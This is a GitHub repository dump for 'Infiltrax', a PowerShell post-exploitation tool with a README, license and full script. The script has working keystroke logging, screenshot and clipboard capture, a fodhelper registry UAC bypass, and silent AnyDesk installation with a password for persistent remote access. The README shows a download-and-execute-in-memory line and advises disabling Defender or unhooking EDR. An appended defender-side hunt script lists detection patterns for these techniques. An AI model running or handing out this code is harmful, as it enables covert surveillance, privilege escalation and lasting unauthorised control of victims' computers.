├── usage.gif
├── LICENSE
├── README.md
└── Infiltrax.ps1

/usage.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/alexdhital/Infiltrax/HEAD/usage.gif
--------------------------------------------------------------------------------

/LICENSE:
--------------------------------------------------------------------------------
MIT License

Copyright (c) 2024 Alex Dhital

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
--------------------------------------------------------------------------------

/README.md:
--------------------------------------------------------------------------------
# Infiltrax
Infiltrax is a post-exploitation reconnaissance tool for penetration testers and red teams, designed to capture screenshots, retrieve clipboard contents, log keystrokes, bypass UAC and install AnyDesk for persistent remote access.

![Infiltrax](https://raw.githubusercontent.com/alexdhital/Infiltrax/main/usage.gif)

## Features

- **Screenshot Capture**: Take screenshots of the entire screen and save them as PNG files.
- **Clipboard Retrieval**: Access the current clipboard contents.
- **Keystroke Logging**: Record keystrokes for a specified duration.
- **UAC Bypass**: Bypasses UAC via fodhelper.exe.
- **AnyDesk Installation**: Install and configure AnyDesk with unattended access.

## Usage
1. **Execute directly into memory**
```powershell
C:\Users\Administrator\Desktop> IEX(New-Object Net.WebClient).downloadString('https://raw.githubusercontent.com/alexdhital/Infiltrax/main/Infiltrax.ps1')
```
2. **Get clipboard contents**
```powershell
C:\Users\Administrator\Desktop> Invoke-Clipboard
```
3. **Take a desktop screenshot and save it to a given location**
```powershell
C:\Users\Administrator\Desktop> Invoke-Screenshot -Path "C:\Windows\Tasks\"
```
4. **Capture user keystrokes and save them to a file**
```powershell
C:\Users\Administrator\Desktop> Invoke-KeyStrokeCapture -DurationInSeconds 30 -OutputPath C:\Users\Vlex\Desktop\keystrokes.txt
```
5. **Bypass UAC to run any program in an elevated context. Default program: powershell.exe**

This function is taken from https://gist.github.com/netbiosX/a114f8822eb20b115e33db55deee6692; all credit goes to netbiosX :). Spawning cmd.exe or powershell.exe from the script gets caught by behavioural detection; disable Defender or unhook the EDR first.
```powershell
C:\Users\Vlex\Desktop> Invoke-FodHelperBypass -program "calc.exe"
```
6. **Install AnyDesk silently, set up unattended access and get the remote ID** (requires administrative privilege)
```powershell
C:\Users\Administrator\Desktop> Invoke-AnyDeskInstall -InstallPath "C:\Users\Alex\AppData\Local\AnyDesk" -Password "Unattended123!"
```
## Warning and Legal Notice
This tool is intended solely for use by penetration testers and red team professionals during authorized post-exploitation engagements. Do not use this tool for unauthorized access or illegal activities.
--------------------------------------------------------------------------------

/Infiltrax.ps1:
--------------------------------------------------------------------------------
<#

Infiltrax File: Infiltrax.ps1
Author: Alex Dhital
License: MIT License
Required Dependencies: None

#>
function Invoke-Clipboard {

    <#
    .SYNOPSIS

    Simply gets the raw clipboard contents via the Get-Clipboard PowerShell cmdlet hehe sry no sry

    #>
    try {
        Get-Clipboard -Raw
    }
    catch {
        Write-Error "Failed to read clipboard: $_"
    }

}

function Invoke-Screenshot {

    Param(
        [Parameter(Mandatory = $true)][string]$Path
    )

    try {
        $FileName = "$env:COMPUTERNAME - $(Get-Date -Format yyyy-MM-dd_HHmmss).png"
        $File = Join-Path $Path $FileName
        Add-Type -AssemblyName System.Windows.Forms
        Add-Type -AssemblyName System.Drawing

        $Screen = [System.Windows.Forms.SystemInformation]::VirtualScreen
        $Width = $Screen.Width
        $Height = $Screen.Height
        $Left = $Screen.Left
        $Top = $Screen.Top

        $bitmap = New-Object System.Drawing.Bitmap $Width, $Height
        $graphic = [System.Drawing.Graphics]::FromImage($bitmap)
        $graphic.CopyFromScreen($Left, $Top, 0, 0, $bitmap.Size)

        $bitmap.Save($File, [System.Drawing.Imaging.ImageFormat]::Png)
        Write-Output "Screenshot saved to: $File"
    }
    catch {
        Write-Error "Failed to save screenshot. Error: $_"
    }
    finally {
        if ($graphic) { $graphic.Dispose() }
        if ($bitmap) { $bitmap.Dispose() }
    }
}

function Invoke-KeyStrokeCapture {
    <#

    .DESCRIPTION
    Uses the GetAsyncKeyState function from user32.dll to map key presses, including special characters, and appends them to the specified file.

    #>

    param(
        [Parameter(Mandatory = $true)][int]$DurationInSeconds,
        [Parameter(Mandatory = $true)][string]$OutputPath
    )

    $signatures = @"
[DllImport("user32.dll")]
public static extern short GetAsyncKeyState(int vKey);
"@
    $API = Add-Type -MemberDefinition $signatures -Name 'Win32' -Namespace API -PassThru

    $null = New-Item -Path $OutputPath -ItemType File -Force

    $endTime = (Get-Date).AddSeconds($DurationInSeconds)

    $keyCodes = @{
        8  = "`b"    # backspace
        13 = "`r`n"  # enter
        32 = " "     # space
        9  = "`t"    # tab
        46 = "DEL"   # delete
    }

    $shiftKeyMapping = @{
        48 = ")"  # for shift + 0
        49 = "!"  # for shift + 1
        50 = "@"  # for shift + 2
        51 = "#"  # for shift + 3
        52 = "$"  # for shift + 4
        53 = "%"  # for shift + 5
        54 = "^"  # for shift + 6
        55 = "&"  # for shift + 7
        56 = "*"  # for shift + 8
        57 = "("  # for shift + 9
    }

    $nonPrintableKeys = @{
        27 = "ESC"    # escape
        33 = "PGUP"   # page up
        34 = "PGDN"   # page down
        35 = "END"    # end
        36 = "HOME"   # home
        37 = "LEFT"   # left arrow
        38 = "UP"     # up arrow
        39 = "RIGHT"  # right arrow
        40 = "DOWN"   # down arrow
    }

    $previousState = @{}
    $modifiers = @{
        16  = $false  # left shift
        160 = $false  # right shift
        17  = $false  # ctrl
        18  = $false  # alt
    }

    function Get-Character {
        param (
            [int]$keyCode
        )

        if ($modifiers[16] -or $modifiers[160]) {
            if ($shiftKeyMapping.ContainsKey($keyCode)) {
                return $shiftKeyMapping[$keyCode]
            }
        }

        if ($keyCode -ge 32 -and $keyCode -le 126) {
            return [char]$keyCode
        }

        if ($nonPrintableKeys.ContainsKey($keyCode)) {
            return $nonPrintableKeys[$keyCode]
        }

        return ""
    }

    Write-Host -NoNewline "Capturing keystrokes: "

    while ((Get-Date) -lt $endTime) {
        Start-Sleep -Milliseconds 50

        for ($keyCode = 8; $keyCode -le 255; $keyCode++) {
            $keyState = $API::GetAsyncKeyState($keyCode)
            $isPressed = ($keyState -band 0x8000) -ne 0

            if ($keyCode -eq 16 -or $keyCode -eq 160) {
                $modifiers[$keyCode] = $isPressed
            } elseif ($keyCode -eq 17 -or $keyCode -eq 18) {
                $modifiers[$keyCode] = $isPressed
            } elseif ($isPressed -and (-not $previousState[$keyCode])) {
                $character = Get-Character -keyCode $keyCode
                [System.IO.File]::AppendAllText($OutputPath, $character, [System.Text.Encoding]::ASCII)

                # Append the keystroke to the same line in the console
                Write-Host -NoNewline $character

                $previousState[$keyCode] = $true
            } elseif (-not $isPressed) {
                if ($previousState.ContainsKey($keyCode)) {
                    $previousState.Remove($keyCode)
                }
            }
        }
    }

    Write-Host "`nKeystroke logging completed. Output saved to $OutputPath"
}

function Invoke-AnyDeskInstall {
    param (
        [Parameter(Mandatory = $true)]
        [string]$InstallPath,

        [Parameter(Mandatory = $true)]
        [string]$Password,

        [string]$AnyDeskURL = "https://download.anydesk.com/AnyDesk.exe",
        [string]$DestinationPath = "C:\Windows\Tasks\AnyDesk.exe"
    )

    function Test-AdminAccess {
        $currentIdentity = [System.Security.Principal.WindowsIdentity]::GetCurrent()
        $principal = New-Object System.Security.Principal.WindowsPrincipal($currentIdentity)
        return $principal.IsInRole([System.Security.Principal.WindowsBuiltInRole]::Administrator)
    }

    function Download-And-Install-AnyDesk {

        New-Item -ItemType Directory -Path (Split-Path -Parent $DestinationPath) -Force -ErrorAction SilentlyContinue

        Write-Output "Downloading AnyDesk from $AnyDeskURL to $DestinationPath"
        Start-BitsTransfer -Source $AnyDeskURL -Destination $DestinationPath

        New-Item -ItemType Directory -Path $InstallPath -Force -ErrorAction SilentlyContinue

        try {
            Write-Output "Installing AnyDesk to $InstallPath"
            Start-Process -FilePath $DestinationPath -ArgumentList "--install `"$InstallPath`" --start-with-win --silent" -Wait
        }
        catch {
            Write-Output "Error Occurred! Could not install AnyDesk to $InstallPath."
        }

        Start-Sleep -Seconds 5

        try {
            Remove-Item $DestinationPath -Force
        } catch {
            Write-Output "Failed to remove file: $_"
        }
    }

    function Find-AnyDeskPath {
        $possiblePaths = @(
            "C:\Program Files\AnyDesk\AnyDesk.exe",
            "C:\Program Files (x86)\AnyDesk\AnyDesk.exe",
            "$InstallPath\AnyDesk.exe"
        )

        foreach ($path in $possiblePaths) {
            if (Test-Path $path) {
                return $path
            }
        }

        return $null
    }

    function Setup-UnattendedAccess {
        $anyDeskPath = Find-AnyDeskPath
        if ($anyDeskPath) {
            Write-Output "Setting password..."
            Start-Process -FilePath $anyDeskPath -ArgumentList "--set-password $Password" -Wait

            $stdoutPath = "C:\Windows\Tasks\id.txt"
            Write-Output "Getting AnyDesk ID..."
            Start-Process -FilePath $anyDeskPath -ArgumentList "--get-id" -RedirectStandardOutput $stdoutPath -NoNewWindow -Wait

            if (Test-Path $stdoutPath) {
                $id = Get-Content $stdoutPath
                Write-Output "AnyDesk ID is: $id"
                Remove-Item $stdoutPath -ErrorAction SilentlyContinue
            } else {
                Write-Output "Failed to retrieve AnyDesk ID. Output file not found."
            }
        } else {
            Write-Output "AnyDesk executable not found. Unattended access setup aborted."
        }
    }

    function Check-AnyDeskInstallation {
        $anydesk = Get-Package -Name AnyDesk -ErrorAction SilentlyContinue
        if ($anydesk) {
            Write-Output "AnyDesk is already installed. Version: $($anydesk.Version)"
        } else {
            Write-Output "AnyDesk is not installed. Installing now..."
            Download-And-Install-AnyDesk
        }

        Setup-UnattendedAccess
    }

    if (-not (Test-AdminAccess)) {
        Write-Output "This function requires Administrative access."
        return
    }

    Check-AnyDeskInstallation
}

function Invoke-FodHelperBypass {

    <#
    .SYNOPSIS

    Bypasses UAC via fodhelper.exe to run a powershell process in an elevated session.
    This function is taken from https://gist.github.com/netbiosX/a114f8822eb20b115e33db55deee6692; netbiosX is the original author.

    .NOTES

    File Name: Infiltrax.ps1
    Original function Author: netbiosX. - pentestlab.blog
    Spawning powershell or cmd from a script gets caught by behavioural detection. Disable Real Time protection or unhook EDR first.

    #>

    Param (

        [String]$program = "cmd /c start powershell.exe"
    )

    New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
    New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
    Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value $program -Force

    Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden

    Start-Sleep 3
    Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force

}
# To do: adding screen recording functionality probably?
--------------------------------------------------------------------------------
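An added defender-side example, not part of Infiltrax or of netbiosX's gist: a PowerShell hunt for the artifacts that Invoke-FodHelperBypass, Invoke-AnyDeskInstall and Invoke-KeyStrokeCapture leave on a host. It assumes PowerShell script block logging (Event ID 4104) is enabled; the `AnyDesk*` service-name pattern and the per-user install path under `%LOCALAPPDATA%` are assumptions drawn from the README's example invocation.

```powershell
# Added example (not Infiltrax code): hunt for the on-host and log artifacts
# of the script above. Assumes 4104 script block logging is enabled; the
# 'AnyDesk*' service pattern and the per-user install path are assumptions.
function Find-InfiltraxArtifacts {
    [CmdletBinding()]
    param([int]$Hours = 24)

    $findings = [System.Collections.Generic.List[string]]::new()

    # 1. fodhelper UAC bypass: the script creates this HKCU key, launches
    #    fodhelper.exe and deletes the key 3 seconds later. A lingering copy
    #    means the bypass is in progress or failed before its cleanup ran.
    $hijack = 'HKCU:\Software\Classes\ms-settings\Shell\Open\command'
    if (Test-Path $hijack) {
        $cmd = (Get-ItemProperty -Path $hijack -ErrorAction SilentlyContinue).'(default)'
        $findings.Add("ms-settings handler hijack present: $hijack -> '$cmd'")
    }

    # 2. AnyDesk persistence: the dropper and the --get-id output are written
    #    to C:\Windows\Tasks; the README installs into a per-user AppData path.
    $paths = 'C:\Windows\Tasks\AnyDesk.exe', 'C:\Windows\Tasks\id.txt',
             "$env:LOCALAPPDATA\AnyDesk\AnyDesk.exe"
    foreach ($p in $paths) {
        if (Test-Path $p) { $findings.Add("AnyDesk artifact on disk: $p") }
    }
    # --start-with-win registers AnyDesk to start with Windows (name assumed).
    Get-Service -Name 'AnyDesk*' -ErrorAction SilentlyContinue |
        ForEach-Object { $findings.Add("AnyDesk service: $($_.Name) ($($_.Status))") }

    # 3. Script block logs: strings specific to this script's techniques and
    #    to the in-memory loader line shown in the README.
    $patterns = 'GetAsyncKeyState', 'ms-settings\\Shell\\Open\\command',
                'fodhelper\.exe', '--set-password', 'Infiltrax', 'downloadString\('
    $filter = @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104;
                 StartTime = (Get-Date).AddHours(-$Hours) }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue |
        ForEach-Object {
            $evt = $_
            $hits = @($patterns | Where-Object { $evt.Message -match $_ })
            if ($hits.Count -gt 0) {
                $findings.Add("4104 at $($evt.TimeCreated): $($hits -join ', ')")
            }
        }

    return $findings
}

Find-InfiltraxArtifacts | ForEach-Object { Write-Warning $_ }
```

HKCU is per-user, so the registry check has to run as the account that executed the bypass; reading the Operational log may require an elevated session.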